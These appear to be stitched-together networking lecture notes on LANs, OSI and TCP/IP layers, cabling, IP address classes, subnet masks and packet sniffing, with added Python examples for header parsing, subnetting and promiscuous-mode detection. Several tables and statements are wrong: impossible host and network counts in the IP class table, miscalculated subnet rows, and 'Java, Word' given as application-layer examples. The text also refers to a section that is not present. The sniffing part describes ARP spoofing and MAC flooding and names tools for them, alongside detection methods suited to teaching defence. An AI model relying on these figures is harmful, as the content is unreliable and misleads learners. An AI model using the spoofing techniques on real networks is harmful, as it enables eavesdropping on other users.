- Examples of LAN technology: Ethernet, Token Ring, and Fiber 
Distributed Data Interface (FDDI). 

Ethernet LANs: based on a bus topology and broadcast communication 

Token ring LANs: based on a ring topology 

FDDI LANs: use optical fibers and an improved token ring mechanism 
based on two rings flowing in opposite directions. 


Network connectivity type       Speed               Transmission time for 10 Mbytes 
(Telephone) dial-up modem       14.4 Kbps           90 min 
ISDN modem                      56/128 Kbps         45/12 min 
T1 connection                   1.54 Mbps           50 s 
Ethernet                        10 Mbps             9 s 
Token ring                      4/16 Mbps 
Fast Ethernet                   100 Mbps 
FDDI                            100 Mbps 
Gigabit Ethernet                1 Gbps 
ATM                             25 Mbps/2.4 Gbps 



Interconnection 

-Networks of low capacity may be connected together via a backbone 
network which is a network of high capacity such as a FDDI network, a 
WAN network etc. 

-LANs and WANs can be interconnected via T1 or T3 digital leased 
lines 

-According to the protocols involved, networks interconnection is 
achieved using one or several of the following devices: 

□ Bridge: a computer or device that links two similar LANs based on 
the same protocol. 

□ Router: a communication computer that connects different types of 
networks using different protocols. 

□ B-router or Bridge/Router: a single device that combines both the 
functions of bridge and router. 

□ Gateway: a network device that connects two different systems, using 
direct and systematic translation between protocols. 


Network Topology Diagram 

The specification of the network topology diagram requires the 
definition of the characteristics and entities underlying the network: 

-Geographical locations of the different components or subnets 
involved in the network. 


-Description of the LAN topology 
-Description of the WAN topology 

-Description of the network connectors such as routers, bridges, 
repeaters, and gateways. 

Protocols 

-Define the rules that govern the communications between two 
computers connected to the network. 

-Roles: addressing and routing of messages, error detection and 
recovery, sequence and flow controls etc. 

- A protocol specification consists of the syntax, which defines the kinds 
and formats of the messages exchanged, and the semantics, which 
specify the action taken by each entity when specific events occur. 


Example: HTTP protocol for communication between web browsers 
and servers. 



-Protocols are designed based on a layered architecture such as the OSI 
reference model. 

-Each entity at a layer n communicates only with entities at layer n-1. 

- The data exchanged, known as a Protocol Data Unit (PDU), goes down 
and up through the layers: each layer adds its own header on the way 
down and removes it on the way up. Therefore a layer n PDU becomes 
the data of a layer n-1 PDU. 


Protocol Layers 

The OSI (Open Systems Interconnection) Data Model 

- ISO standard for the design and functioning of computer networks. 

- Involves at least 7 layers, each playing a specific role when 
applications are communicating over the net. 

- During the sending process, each layer (from top to bottom) will add 
a specific header to the raw data. 

- At reception, headers are removed in the reverse order until the data 
arrives at the receiving application. 


Physical layer: ensures a safe and efficient travel of data; consists of 
electronic circuits for data transmission etc. 

Data link layer: in charge of data encapsulation under the form of 
packets and their interpretation at the physical layer. 

Network layer: in charge of packet transmission from a source A to a 
destination B. 

Transport layer: in charge of the delivery of packets from a source A 
to a destination B. 

Session layer: in charge of the management of network access. 

Presentation layer: determines the format of the data transmitted to 
applications, data compressing/decompressing, encrypting etc. 

Application layer: contains the applications which are used by the 
end-user, such as Java, Word etc. 


The TCP/IP Model 

Network layer 

- Provides the same functionality as the physical, the data link and 
network layers in the OSI model. 

- Mapping between IP addresses and network physical addresses. 

- Encapsulation of IP datagrams, i.e. packets, in a format understandable 
by the network. 

Internet layer 

-Lies at the heart of TCP/IP. 

-Based on the Internet Protocol (IP), which provides the frame for 
transmitting data from place A to place B. 



Transport layer 

-Based on two main protocols: TCP (Transmission Control Protocol) 
and UDP (User Datagram protocol) 

Application layer 

-Combines the functions of the OSI application, presentation, and 
session layers. 

-Protocols involved in this layer: HTTP, FTP, SMTP etc. 


Networks Interconnection/Internet 
Concept of Network Interconnection 

- First implemented in the Defense Advanced Research Projects Agency 
Network (Arpanet), in 1966 in the USA. 

-Consists of connecting several computer networks based on different 
Protocols 

- Requires the definition of a common interconnection protocol on top of 
the local protocols. 

-The Internet Protocol (IP) plays this role, by defining unique addresses 
for a network and a host machine. 


Internet Protocol (IP) 



Overview 


- The IP protocol provides two main functions: 

□ Decomposition of the initial information flow into packets of 
standardized size, and reassembly at the destination. 

□ Routing of a packet through successive networks, from the source 
machine to the destination identified by its IP address. 

- Transmitted packets are not guaranteed to be delivered (datagram 
protocol). 

- The IP protocol does not establish a connection (connectionless) 
before sending data and does not perform any error detection on the data. 

Functions 

-Decompose the initial data (to be sent) into datagrams. 

- Each datagram will have a header including the IP address and the 
port number of the destination. 

- Datagrams are then sent to selected gateways, i.e. IP routers, connected 
at the same time to the local network and to an IP service provider 
network. 

- Datagrams are transferred from gateway to gateway until they arrive 
at their final destination. 



Structure of an IP packet 


-The fields at the beginning of the packet, called the frame header, 
define the IP protocol’s functionality and limitations. 

-32 bits are allocated for encoding source and destination addresses (32 
bits for each of these address fields). 


-The remainder of the header (16 bits) encodes various information such 
as the total packet length in bytes. 

-Hence an IP packet can be a maximum of 64Kb long. 
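The 20-byte IPv4 header described above can be built and decoded in a few lines. The following is an added example, not code from the slides: it packs the header fields with Python's struct module, fills in the 16-bit one's-complement header checksum that every router verifies, and parses a packet back, rejecting a truncated packet, a total-length field larger than the bytes actually captured, or a corrupted header. The addresses and payload are constructed sample values.

```python
"""Added example (not from the slides): build and parse the 20-byte IPv4
header with struct, including the RFC 1071 header checksum.  Addresses and
payload are constructed sample values."""
import struct
import socket

IPV4_FMT = "!BBHHHBBH4s4s"   # network byte order, 20 bytes without options
IPV4_LEN = struct.calcsize(IPV4_FMT)
MAX_PACKET = 0xFFFF           # total-length field is 16 bits -> 65,535 bytes

def checksum(data):
    """One's-complement sum of 16-bit words, folded to 16 bits, complemented."""
    if len(data) % 2:
        data += b"\x00"
    total = sum(struct.unpack("!%dH" % (len(data) // 2), data))
    while total >> 16:
        total = (total & 0xFFFF) + (total >> 16)
    return (~total) & 0xFFFF

def build_ipv4(src, dst, payload, proto=17, ttl=64, ident=0x1234):
    """Return header+payload bytes for an IPv4 packet with no options."""
    total_len = IPV4_LEN + len(payload)
    if total_len > MAX_PACKET:
        raise ValueError("payload too large for a single IPv4 packet")
    ver_ihl = (4 << 4) | (IPV4_LEN // 4)      # version 4, IHL = 5 words
    flags_frag = 0x4000                        # DF set, fragment offset 0
    hdr = struct.pack(IPV4_FMT, ver_ihl, 0, total_len, ident, flags_frag,
                      ttl, proto, 0, socket.inet_aton(src), socket.inet_aton(dst))
    csum = checksum(hdr)                       # computed with the field zeroed
    hdr = hdr[:10] + struct.pack("!H", csum) + hdr[12:]
    return hdr + payload

def parse_ipv4(packet):
    """Decode the fixed header; verify version, IHL, total length and the
    checksum so a truncated or corrupted packet is rejected, not mis-parsed."""
    if len(packet) < IPV4_LEN:
        raise ValueError("truncated header")
    fields = struct.unpack(IPV4_FMT, packet[:IPV4_LEN])
    ver_ihl, tos, total_len, ident, flags_frag, ttl, proto, csum, s, d = fields
    version, ihl = ver_ihl >> 4, (ver_ihl & 0x0F) * 4
    if version != 4 or ihl < IPV4_LEN:
        raise ValueError("not an IPv4 header")
    if total_len > len(packet) or total_len < ihl:
        raise ValueError("total length inconsistent with captured bytes")
    if checksum(packet[:ihl]) != 0:           # sum over a valid header is 0
        raise ValueError("bad header checksum")
    return {
        "version": version, "ihl": ihl, "total_length": total_len,
        "id": ident, "df": bool(flags_frag & 0x4000),
        "fragment_offset": flags_frag & 0x1FFF, "ttl": ttl,
        "protocol": proto, "src": socket.inet_ntoa(s), "dst": socket.inet_ntoa(d),
        "payload": packet[ihl:total_len],
    }

def is_valid_ipv4(packet):
    """True when parse_ipv4 accepts the bytes."""
    try:
        parse_ipv4(packet)
        return True
    except ValueError:
        return False

if __name__ == "__main__":
    pkt = build_ipv4("192.0.2.1", "198.51.100.9", b"hello")
    print(pkt.hex())
    print(parse_ipv4(pkt))
```

Note that the checksum only protects the header: a corrupted payload passes this check unnoticed, which is why TCP and UDP carry their own checksums over the data.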


Transmission Control Protocol (TCP) 

Overview 

- TCP provides, on top of IP packets, a basic service that does guarantee 
safe delivery: 

□ error detection 
□ safe data transmission 
□ assurance that data are received in the correct order 

- Before sending data, TCP requires that the communicating computers 
establish a connection (connection-oriented protocol). 

- TCP provides support for sending and receiving arbitrary amounts of 
data as one big stream of bytes (IP is limited to 64Kb). 

- TCP does so by breaking up the data stream into separate IP packets. 

- Packets are numbered, and reassembled on arrival, using sequence and 
acknowledgement numbers. 

- TCP also improves the capability of IP by specifying port numbers. 

□ There are 65,536 different TCP ports (sockets) through which every 
TCP/IP machine can talk. 
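What "reassembled on arrival using sequence numbers" means in practice is shown by the receiver below, an added example written for these notes and not code from the slides or from any TCP implementation: segments arrive out of order, duplicated and with a temporary gap, and the receiver releases bytes only once every earlier byte is present, while its cumulative acknowledgement is the sequence number of the next byte it expects. The initial sequence number and the segments are constructed sample data.

```python
"""Added example (not from the slides): reassemble a byte stream from TCP
segments that arrive out of order, duplicated and with a gap, using the
sequence number each segment carries.  Segments are constructed samples."""

class Reassembler:
    """Receiver-side buffer that releases bytes strictly in sequence order."""

    def __init__(self, initial_seq):
        self.next_seq = initial_seq      # sequence number of the next byte to deliver
        self.pending = {}                # seq -> data, segments waiting for a gap to close
        self.delivered = bytearray()

    def receive(self, seq, data):
        """Accept one segment; return the bytes it made deliverable (may be empty)."""
        if seq + len(data) <= self.next_seq:
            return b""                   # pure duplicate: every byte already delivered
        # Keep the longer copy if the same sequence number was seen before.
        if seq not in self.pending or len(data) > len(self.pending[seq]):
            self.pending[seq] = data
        out = self._drain()
        self.delivered += out
        return bytes(out)

    def _drain(self):
        out = bytearray()
        while self.pending:
            seq = min(self.pending)
            if seq > self.next_seq:
                break                    # gap: the missing segment has not arrived yet
            data = self.pending.pop(seq)
            if seq + len(data) <= self.next_seq:
                continue                 # overlaps entirely with delivered data
            data = data[self.next_seq - seq:]   # trim the already-delivered prefix
            out += data
            self.next_seq += len(data)
        return out

    def ack(self):
        """Cumulative acknowledgement: the next byte the receiver expects."""
        return self.next_seq

    def missing(self):
        """(start, end) of the gap before the earliest buffered segment, or None."""
        if not self.pending:
            return None
        return (self.next_seq, min(self.pending))

# Constructed arrival order: segment 2 arrives before segment 1, segment 4
# before segment 3, and segment 1 is seen twice (a retransmission).
ISN = 1000
SEGMENTS = [
    (1005, b"WORLD"),      # bytes 1005-1009, out of order
    (1000, b"HELLO"),      # bytes 1000-1004
    (1000, b"HELLO"),      # duplicate
    (1015, b"TCP!"),       # bytes 1015-1018, arrives before 1010
    (1010, b"FROM "),      # bytes 1010-1014 close the gap
]

def run(segments, isn=ISN):
    """Feed segments in order of arrival; return (stream, [(seq, delivered, ack)])."""
    r = Reassembler(isn)
    log = [(seq, r.receive(seq, d), r.ack()) for seq, d in segments]
    return bytes(r.delivered), log

if __name__ == "__main__":
    stream, log = run(SEGMENTS)
    for seq, out, ack in log:
        print(f"seq={seq} delivered={out!r} ack={ack}")
    print("stream:", stream)
```

The missing() method is what drives retransmission on a real stack: the sender keeps seeing the same ACK value while a gap is open and resends the bytes starting there.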


User Datagram Protocol (UDP) 

Overview 

- Datagram protocol, also built on top of IP. 

- Has the same packet-size limit (64Kb) as IP, but allows for port 
number specification. 

- Also provides 65,536 different ports. 

- Hence, every machine has two sets of 65,536 ports: one for TCP and the 
other for UDP. 

- Connectionless protocol, without any error detection facility. 

- Provides only support for data transmission from one end to the other, 
without any further verification. 

- The main interest of UDP is that, since it does not make further 
verification, it is very fast. 

- Useful for sending small amounts of data in a repetitive way, such as time 
information. 


Internet Application Protocols 

On top of TCP/IP, several services have been developed in order to 
homogenize applications of the same nature: 

- FTP (File Transfer Protocol) allows the transfer of collections of files 
between two machines connected to the Internet. 

- Telnet (Terminal Protocol) allows a user to connect to a remote host in 
terminal mode. 

- NNTP (Network News Transfer Protocol) allows the constitution of 
communication groups (newsgroups) organized around specific topics. 

- SMTP (Simple Mail Transfer Protocol) defines a basic service for 
electronic mail. 

- SNMP (Simple Network Management Protocol) allows the 
management of the network. 


[Figure: the TCP/IP protocol stack. Application layer: FTP, TELNET, SMTP, SNMP; transport layer: TCP/UDP; network layer: IP; link layer: Ethernet, Arpanet, Token ring] 


14. Network Cabling 


Learning Objectives 

• List common cable types used in networking 

• Describe how UTP cables are made 

• Explain how UTP cables are used in Ethernet networks 

• Demonstrate the ability to make a working patch cable 

• Name the two wiring standards used for wired Ethernet networks and their uses 


Common network cable types 


• Coaxial cable 

• Unshielded twisted pair 

• Fiber optic 




UTP characteristics 

• Unshielded 

• Twisted (why?) pairs of insulated conductors 

• Covered by an insulating sheath 

[Figure: UTP cable cross-section, labelled conductor, insulation, pair, sheath] 


UTP categories 

Category 1      Voice only (Telephone) 
Category 2      Data to 4 Mbps (LocalTalk) 
Category 3      Data to 10 Mbps (Ethernet) 
Category 4      Data to 20 Mbps (Token ring) 
Category 5      Data to 100 Mbps (Fast Ethernet) 
Category 5e     Data to 1000 Mbps (Gigabit Ethernet) 
Category 6      Data to 2500 Mbps (Gigabit Ethernet) 


Cat5e cable 

• 1000 Mbps data capacity 

• For runs of up to 90 meters 

• Solid core cable ideal for structural installations (PVC or Plenum) 

• Stranded cable ideal for patch cables 

• Terminated with RJ-45 connectors 


RJ45 connector 




Making connections - Tools 

• Cat5e cable 

• RJ45 connectors 

• Cable stripper 

• Scissors 

• Crimping tool 



Making connections - Steps 

1. Strip cable end 

2. Untwist wire ends 

3. Arrange wires 

4. Trim wires to size 

5. Attach connector 


6. Check 


7. Crimp 

8. Test 


Step 1 - Strip cable end 

• Strip 1 - 1½” of insulating sheath 

• Avoid cutting into conductor insulation 

Step 2 - Untwist wire ends 

• Sort wires by insulation colors 




Step 3 - Arrange wires 

• TIA/EIA 568A: GW-G OW-Bl BlW-O BrW-Br 

• TIA/EIA 568B: OW-O GW-Bl BlW-G BrW-Br 




Step 4 - Trim wires to size 

• Trim all wires evenly 

• Leave about ½” of wires exposed 



Step 5 - Attach connector 


• Maintain wire order, left-to-right, with RJ45 tab facing downward 



Step 6 - Check 

• Do all wires extend to end? 

• Is sheath well inside connector? 








Step 7 - Crimp 


• Squeeze firmly to crimp the connector 
onto the cable end (8P) 

After Crimping 


Step 8 - Test 

• Does the cable work? 





15. IP Class 


IP Address Classifications 


Class   Bits in Network ID   Number of Networks   Bits in Host ID   Number of Hosts/Network   Address Range                  Subnet Mask 
A       8                    126                  24                4000,000                  1.0.0.0 to 126.255.255.255     255.0.0.0 
B       16                   16384                16                65536                     128.0.0.0 to 191.255.255.255   255.255.0.0 
C       24                   2000,000             8                 65536                     192.0.0.0 to 223.255.255.255   255.255.255.0 
D       0                                         28                268,400,000               224.0.0.0 to 239.255.255.255 
E       Class E addresses are reserved for future use (and Class D are usually used for testing only). 


Assigning Host IDs: 

> a.b.c.1 through a.b.c.10 - usually routers and servers 

> a.b.c.11 through a.b.c.204 - usually workstations 

> a.b.c.241 through a.b.c.254 - usually UNIX (or Linux) hosts 

Intranet Network IDs: 

> 10.0.0.0 through 10.255.255.255 - usually internal networks 

> 172.16.0.0 through 172.31.255.255 - usually intranets not connected to the Internet 

> 192.168.0.0 through 192.168.255.255 - usually networks connected to the Internet 
(and usually behind a firewall) 
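The class of an address follows from its first byte alone, so the table above can be reproduced by code. The following is an added example, not code from the slides: it classifies an IPv4 address, derives the default classful mask and the network/host split (the "R network bytes / H host bytes" of the Addressing section earlier), and flags the three intranet ranges listed above, which the standard ipaddress module knows as private. The sample addresses are constructed.

```python
"""Added example (not from the slides): classify an IPv4 address by its
leading bits, derive the classful default mask and the network/host
split, and flag the private (intranet) ranges.  Sample addresses are
constructed."""
import ipaddress

# class -> (first-byte range, network bits, default mask)
CLASSES = {
    "A": ((0, 127), 8, "255.0.0.0"),
    "B": ((128, 191), 16, "255.255.0.0"),
    "C": ((192, 223), 24, "255.255.255.0"),
    "D": ((224, 239), None, None),    # multicast: no network/host split
    "E": ((240, 255), None, None),    # reserved
}

def classify(addr_str):
    """Return a dict with class, default mask, network ID, host ID and the
    private-range flag for an IPv4 address string (raises on bad input)."""
    addr = ipaddress.IPv4Address(addr_str)
    first = int(addr) >> 24
    cls, nbits, mask = next(
        (c, n, m) for c, ((lo, hi), n, m) in CLASSES.items() if lo <= first <= hi
    )
    info = {"address": str(addr), "class": cls, "private": addr.is_private}
    if nbits is None:
        info.update(mask=None, network=None, host=None, network_bytes=0)
        return info
    net = ipaddress.IPv4Network(f"{addr}/{nbits}", strict=False)
    info.update(
        mask=mask,
        network=str(net.network_address),
        host=int(addr) & int(net.hostmask),    # host part as an integer
        network_bytes=nbits // 8,              # the R of the Addressing slide
        host_bytes=4 - nbits // 8,             # the H of the Addressing slide
        usable_hosts=net.num_addresses - 2,    # minus network and broadcast
    )
    return info

if __name__ == "__main__":
    for a in ["136.102.233.49", "10.1.2.3", "172.20.0.9", "192.168.1.77", "224.0.0.5"]:
        print(classify(a))
```

Classful rules are historical; routers today use the prefix length carried with each route (CIDR), which is what the subnet-mask tables in the next section are really about.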


Class A Subnet Masks 

Subnet Mask        Bits in Mask   Number of Usable Subnets   Number of Hosts per Subnet 
255.0.0.0          8              1                          16,777,214 
255.192.0.0        10             2                          4,194,302 
255.240.0.0        12             14                         1,048,574 
255.255.0.0        16             254                        65,634 
255.255.128.0      17             510                        32,766 
255.255.240.0      20             4094                       4094 
255.255.255.128    25             131070                     126 
255.255.255.240    28             1,048,574                  14 
255.255.255.252    30             4,192,302                  2 

Class B Subnet Masks 

Subnet Mask        Bits in Mask   Number of Usable Subnets   Number of Hosts per Subnet 
255.255.0.0        16             1                          65,634 
255.255.192.0      18             2                          16382 
255.255.240.0      20             14                         4094 
255.255.255.0      24             254                        254 
255.255.255.240    28             4094                       14 
255.255.255.252    30             16382                      2 

Class C Subnet Masks 

Subnet Mask        Bits in Mask   Number of Usable Subnets   Number of Hosts per Subnet 
255.255.255.0      24             1                          254 
255.255.255.192    26             2                          62 
255.255.255.224    27             6                          30 
255.255.255.240    28             14                         14 
255.255.255.248    29             6                          30 
255.255.255.252    30             62                         2 
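Every row of the three tables above is a function of the mask alone, so the columns can be computed rather than memorised. The following is an added example, not code from the slides: it derives the bits in the mask, the number of usable subnets and the hosts per subnet for a given class and mask, and enumerates the subnets a mask carves out of a network. The subnet count uses the convention of the tables (2^n - 2, discarding the all-zeros and all-ones subnets); pass classic=False for the modern CIDR count of 2^n. Hosts per subnet are always 2^h - 2 because the network and broadcast addresses cannot be assigned. The sample network is constructed.

```python
"""Added example (not from the slides): compute the subnet-table columns
from a mask and enumerate the resulting subnets.  The usable-subnet count
follows the tables' 2^n - 2 convention unless classic=False."""
import ipaddress

CLASS_BITS = {"A": 8, "B": 16, "C": 24}

def mask_bits(mask):
    """Number of one bits in a dotted-quad mask; rejects non-contiguous masks."""
    value = int(ipaddress.IPv4Address(mask))
    bits = bin(value).count("1")
    if value != (0xFFFFFFFF << (32 - bits)) & 0xFFFFFFFF:
        raise ValueError(f"{mask} is not a contiguous subnet mask")
    return bits

def subnet_table_row(net_class, mask, classic=True):
    """Return (bits, usable_subnets, hosts_per_subnet) for one table row."""
    bits = mask_bits(mask)
    subnet_bits = bits - CLASS_BITS[net_class]
    host_bits = 32 - bits
    if subnet_bits < 0 or host_bits < 2:
        raise ValueError("mask does not fit this class")
    if subnet_bits == 0:
        subnets = 1                               # the unsubnetted network
    else:
        subnets = 2 ** subnet_bits - (2 if classic else 0)
    return bits, subnets, 2 ** host_bits - 2

def enumerate_subnets(network, mask):
    """List (subnet, first host, last host, broadcast) for every subnet that
    `mask` carves out of `network`, e.g. 192.168.10.0/24 with 255.255.255.224."""
    base = ipaddress.IPv4Network(network, strict=False)
    rows = []
    for sub in base.subnets(new_prefix=mask_bits(mask)):
        hosts = list(sub.hosts())
        rows.append((str(sub), str(hosts[0]), str(hosts[-1]), str(sub.broadcast_address)))
    return rows

if __name__ == "__main__":
    for cls, mask in [("A", "255.240.0.0"), ("B", "255.255.255.0"), ("C", "255.255.255.224")]:
        print(cls, mask, subnet_table_row(cls, mask))
    for row in enumerate_subnets("192.168.10.0/24", "255.255.255.224"):
        print(row)
```

Running the three sample rows reproduces the corresponding table entries (12/14/1,048,574; 24/254/254; 27/6/30), and the function can be used to double-check any other row.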











16. Packet Sniffing 


What is a "packet sniffer"? 

A packet sniffer is a wire-tap device (hardware or software) that plugs into computer networks and eavesdrops on the 
network traffic. Like a telephone wiretap, it allows us to listen in on other people's conversations. 

□ A "sniffing" program lets someone listen in on computer conversations. 


Introduction 


Terminology: A packet sniffer is also known as a network analyzer or protocol analyzer, or, for particular types 
of networks, an Ethernet sniffer or wireless sniffer. 

□ A packet sniffer can intercept and log traffic passing over a digital network or part of a network. 

As data streams travel back and forth over the network, the sniffer captures each packet and 
eventually decodes and analyzes its content according to the relevant specifications. 

However, computer conversations consist of apparently random binary data. Therefore, network 
wiretap programs also come with a feature known as "protocol analysis", which allows them to "decode" 
the computer traffic and make sense of it. 


shared media 


Sniffing also has one advantage over telephone wiretaps: many networks use "shared media". 

This means that you don't need to break into a wiring closet to install your wiretap, you can do it from 
almost any network connection to eavesdrop on your neighbors. This is called a "promiscuous mode" 
sniffer. However, this "shared" technology is moving quickly toward "switched" technology where this 
will no longer be possible, which means you will have to actually tap into the wire. 


On wired broadcast LANs, depending on the network structure (hub or switch), one can capture traffic 
on all or just parts of the traffic from a single machine within the network; however, there are some 
methods to avoid traffic narrowing by switches to gain access to traffic from other systems on the 
network (e.g. ARP spoofing). 

□ For network monitoring purposes it may also be desirable to monitor all data packets in a LAN by 
using a network switch with a so-called monitoring port, whose purpose is to mirror all packets passing 
through all ports of the switch 


[Figure: three servers and three stations attached to one hub/switch, with three conversations in progress: 1 - Server 2 + Hub/Switch + Station 2; 2 - Server 1 + Hub/Switch + Station 1; 3 - Server 3 + Hub/Switch + Station 3] 




1. ARP Spoofing: We have explained earlier how ARP is used to obtain the MAC 
address of the destination machine with which we wish to communicate. ARP 
is stateless: a reply can be sent even if one has not been asked for, and 
such a reply will be accepted. Ideally, when you want to sniff the traffic originating 
from machine Venus, you ARP-spoof the gateway of the network. The ARP 
cache of Venus will now have a wrong entry for the gateway and is said to be 
poisoned. This way all the traffic destined for the gateway will pass through your 
machine. Another trick that can be used is to poison a host's ARP cache by setting 
the gateway's MAC address to FF:FF:FF:FF:FF:FF (also known as the broadcast 
MAC). An excellent tool for this is the arpspoof utility that comes with the dsniff 

2. MAC Flooding: Switches keep a translation table that maps MAC 
addresses to the physical ports on the switch. As a result, a switch can intelligently 
forward frames from one host to another. The switch has limited memory for this 
table. MAC flooding makes use of this limitation to bombard the switch with fake 
MAC addresses until the switch can't keep up. The switch then enters what is 
known as a "fail-open mode", wherein it starts acting as a hub by broadcasting 
frames to all the machines on the network. Once that happens sniffing can be 
performed easily. MAC flooding can be performed with macof, a utility that 
comes with the dsniff suite. 


How does sniffing work? 

□ Ethernet was built around a "shared" principle: all machines on a local network share the same wire. 

□ This implies that all machines are able to "see" all the traffic on the same wire. 


□ Thus, Ethernet hardware is built with a "filter" that ignores all traffic that doesn't belong to it. It does 
this by ignoring all frames whose MAC address doesn't match. 



A sniffer program turns off this filter, putting the Ethernet hardware into "promiscuous mode". Thus, 
Mark can see all the traffic among all machines, as long as they are on the same Ethernet wire. 

What is it used for? 

□ Sniffing programs have been around for a long time in two forms. Commercial packet sniffers are 
used to help maintain networks. 

□ Underground packet sniffers are used to break into computers. 

Why use packet sniffing? 

□ The versatility of packet sniffers means they can be used to: 

□ Analyse network problems. 

□ Detect network intrusion attempts. 

□ Gain information for effecting a network intrusion. 

□ Gather and report network statistics. 

□ Filter suspect content from network traffic. 

□ Debug client/server communications 



□ Malicious use: 


□ Spy on other network users and collect sensitive information such as passwords (depending on 
any content encryption methods which may be in use) 

□ Reverse engineer protocols used over the network. 


Example uses 

□ A packet sniffer for a token ring network could detect that the token has been lost or the presence 
of too many tokens (verifying the protocol). 

□ A packet sniffer could detect that messages are being sent to a network adapter; if the network 
adapter did not report receiving the messages then this would localize the failure to the adapter. 

□ A packet sniffer could detect excessive messages being sent by a port, detecting an error in the 
implementation. 

□ A packet sniffer could collect statistics on the amount of traffic (number of messages) from a process 
detecting the need for more bandwidth or a better method. 


What are the components of a packet sniffer? 


□ The hardware: Most products work from standard network adapters, though some require special 
hardware. If you use special hardware, you can analyze hardware faults like CRC errors, voltage 
problems, cable problems, "dribbles", "jitter", negotiation errors, and so forth. 

□ Capture driver: This is the most important part. It captures the network traffic from the wire, filters 
it for the particular traffic you want, then stores the data in a buffer. 

□ Buffer: Once the frames are captured from the network, they are stored in a buffer. 

□ Decode: this displays the contents of network traffic with descriptive text so that an analyst can 
figure out what is going on. 

□ Packet editing/transmission: Some products contain features that allow you to edit your own 
network packets and transmit them onto the network. 


Sniffing Detection 


• Ping Method: The trick used here is to send a ping request with the IP address of the 
suspect machine but not its MAC address. Ideally nobody should see this packet as each 
Ethernet Adapter will reject it as it does not match its MAC address. But if the suspect 
machine is running a sniffer it will respond, as it does not bother rejecting packets with a 
different Destination MAC address. This is an old method and not reliable any longer. 

• ARP Method: A machine caches ARPs. So what we do is send a non-broadcast ARP. A 
machine in promiscuous mode will cache your ARP address. Next we send a broadcast 
ping packet with our IP, but a different MAC address. Only a machine that has our correct 
MAC address from the sniffed ARP frame will be able to respond to our broadcast ping 
request. Voila! 



• On Local Host: Often after your machine has been compromised, hackers will leave 
sniffers, to compromise other machines. On a local machine run ifconfig. On a clean 
machine the output will be: 


[root@ringwraith root]# /sbin/ifconfig 

eth0  Link encap:Ethernet  HWaddr 52:54:05:F3:95:01 
      inet addr:203.199.66.243  Bcast:203.199. ... 
      UP BROADCAST RUNNING MULTICAST  MTU:1500 ... 

But on a machine running a sniffer the output will be slightly different. Specifically check the 
last line wherein it mentions "RUNNING PROMISC". That means the machine is in 
promiscuous mode and probably a sniffer is running on it. 

[root@ringwraith root]# /sbin/ifconfig 

eth0  Link encap:Ethernet  HWaddr 52:54:05:F3:95:01 
      inet addr:203.199.66.243  Bcast:203.199. ... 
      UP BROADCAST RUNNING PROMISC MULTICAST 

The output of the ifconfig command has been slightly modified to fit the screen. 
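The local-host check above is easy to automate so that it can run from a cron job or a Nagios plugin. The following is an added example, not code from the slides: it scans interface listings for the PROMISC flag, understanding both the classic ifconfig layout quoted above and the flag list printed by the newer "ip link show" command on Linux, and optionally runs the live command on the host. The three listings are constructed samples using documentation address ranges; the ringwraith host and its addresses are not reused.

```python
"""Added example (not from the slides): find interfaces in promiscuous
mode from an interface listing, in either the classic ifconfig layout or
the "ip link show" layout.  The listings below are constructed samples."""
import re
import subprocess

IFCONFIG_RE = re.compile(r"^(?P<name>\S+)\s+Link encap:", re.M)
# ip link: "2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 ..."
IPLINK_RE = re.compile(r"^\d+: (?P<name>[^:@]+)[^ ]*: <(?P<flags>[^>]*)>", re.M)

def promiscuous_interfaces(output):
    """Return the sorted names of interfaces whose flag line contains PROMISC."""
    found = set()
    # ifconfig: each interface block starts at column 0, flags on an indented line
    for block in re.split(r"\n(?=\S)", output):
        m = IFCONFIG_RE.match(block)
        if m and re.search(r"\bPROMISC\b", block):
            found.add(m.group("name"))
    for m in IPLINK_RE.finditer(output):
        if "PROMISC" in m.group("flags").split(","):
            found.add(m.group("name"))
    return sorted(found)

def live_check():
    """Run the local interface listing and report.  Returns [] where neither
    command exists (the check is Linux-oriented); an empty result on Linux
    means no interface is currently promiscuous."""
    for cmd in (["ip", "link", "show"], ["/sbin/ifconfig", "-a"]):
        try:
            out = subprocess.run(cmd, capture_output=True, text=True, check=True).stdout
        except (OSError, subprocess.CalledProcessError):
            continue
        return promiscuous_interfaces(out)
    return []

# Constructed listings (addresses are documentation ranges).
CLEAN_IFCONFIG = """\
eth0      Link encap:Ethernet  HWaddr 52:54:00:12:34:56
          inet addr:203.0.113.43  Bcast:203.0.113.255  Mask:255.255.255.0
          UP BROADCAST RUNNING MULTICAST  MTU:1500  Metric:1
lo        Link encap:Local Loopback
          inet addr:127.0.0.1  Mask:255.0.0.0
          UP LOOPBACK RUNNING  MTU:16436  Metric:1
"""
SNIFFING_IFCONFIG = CLEAN_IFCONFIG.replace("RUNNING MULTICAST", "RUNNING PROMISC MULTICAST")
IPLINK_OUTPUT = """\
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN
2: eth0: <BROADCAST,MULTICAST,PROMISC,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
3: eth1: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc fq_codel state UP
"""

if __name__ == "__main__":
    print("clean:", promiscuous_interfaces(CLEAN_IFCONFIG))
    print("sniffing:", promiscuous_interfaces(SNIFFING_IFCONFIG))
    print("ip link:", promiscuous_interfaces(IPLINK_OUTPUT))
    print("this host:", live_check())
```

Keep the slide's caveat in mind: an attacker who has root can replace ifconfig or ip with a version that hides the flag, so this check is evidence, not proof, and a positive result from another host (the ARP-based methods above) carries more weight.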


Sniffing Detection programs 


• Anti Sniff: From L0pht Heavy Industries comes the program Anti Sniff. It has the 
ability to monitor a network and detect if a computer is in promiscuous mode. Available at: 

http://www.securitysoftwaretech.com/antisniff/download.html 

• Neped: It detects network cards on the network that are in promiscuous mode by exploiting 
a flaw in the ARP protocol as implemented on Linux machines. Outdated. Available at: 

ftp://apostols.org/AposTools/snapshots/neped/neped.c 

• ARP Watch: ARPWatch keeps track of Ethernet/IP address pairings. This is useful when 
you suspect you are being ARP-spoofed. Available at: 

ftp://ftp.ee.lbl.gov/arpwatch.tar.Z 

• Snort: Snort is an excellent Intrusion Detection System and its arp-spoof preprocessor can 
be used to detect instances of ARP spoofing, which might be an indication that someone 
on the network is sniffing. Available at: 

http://www.snort.org/ 
